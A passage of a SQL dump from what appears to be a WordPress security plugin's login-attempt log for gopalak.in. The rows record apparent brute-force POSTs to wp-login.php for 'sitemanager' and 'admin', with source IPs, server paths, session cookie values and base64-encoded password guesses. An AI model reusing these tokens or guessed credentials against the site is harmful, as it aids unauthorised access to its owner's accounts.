ONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398419.1935699;s:12:\"REQUEST_TIME\";i:1745398419;}}','170.64.166.21',1,'2025-04-23 14:23:40','2025-04-23 14:33:44'),(93865,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7MTIzNDU2Nzg%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398421.042665;s:12:\"REQUEST_TIME\";i:1745398421;}}','170.64.166.21',1,'2025-04-23 14:23:42','2025-04-23 14:33:44'),(93866,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7cXdlcnR5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398422.8314469;s:12:\"REQUEST_TIME\";i:1745398422;}}','170.64.166.21',1,'2025-04-23 14:23:44','2025-04-23 14:33:44'),(93867,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53676\";s:11:\"REMOTE_ADDR\";s:12:\"92.53.96.101\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745398813.6966269;s:12:\"REQUEST_TIME\";i:1745398813;}}','92.53.96.101',0,'2025-04-23 14:30:15','1970-01-01 00:00:00'),(93868,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"80\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7cG9va2ll\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"80\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399022.936754;s:12:\"REQUEST_TIME\";i:1745399022;}}','170.64.166.21',1,'2025-04-23 14:33:44','2025-04-23 14:43:51'),(93869,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:294:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7Y2FwdGFpbg%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399024.7597771;s:12:\"REQUEST_TIME\";i:1745399024;}}','170.64.166.21',1,'2025-04-23 14:33:46','2025-04-23 14:43:51'),(93870,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"77\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7dHVja2Vy\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"77\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399026.5605879;s:12:\"REQUEST_TIME\";i:1745399026;}}','170.64.166.21',1,'2025-04-23 14:33:48','2025-04-23 14:43:51'),(93871,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7Ymx1ZQ%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399028.3432119;s:12:\"REQUEST_TIME\";i:1745399028;}}','170.64.166.21',1,'2025-04-23 14:33:49','2025-04-23 14:43:51'),(93872,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7bGl2ZXJwb29s\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399030.1577959;s:12:\"REQUEST_TIME\";i:1745399030;}}','170.64.166.21',1,'2025-04-23 14:33:51','2025-04-23 14:43:51'),(93873,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40548\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.124.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399209.4451931;s:12:\"REQUEST_TIME\";i:1745399209;}}','167.86.124.24',0,'2025-04-23 14:36:51','1970-01-01 00:00:00'),(93874,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like 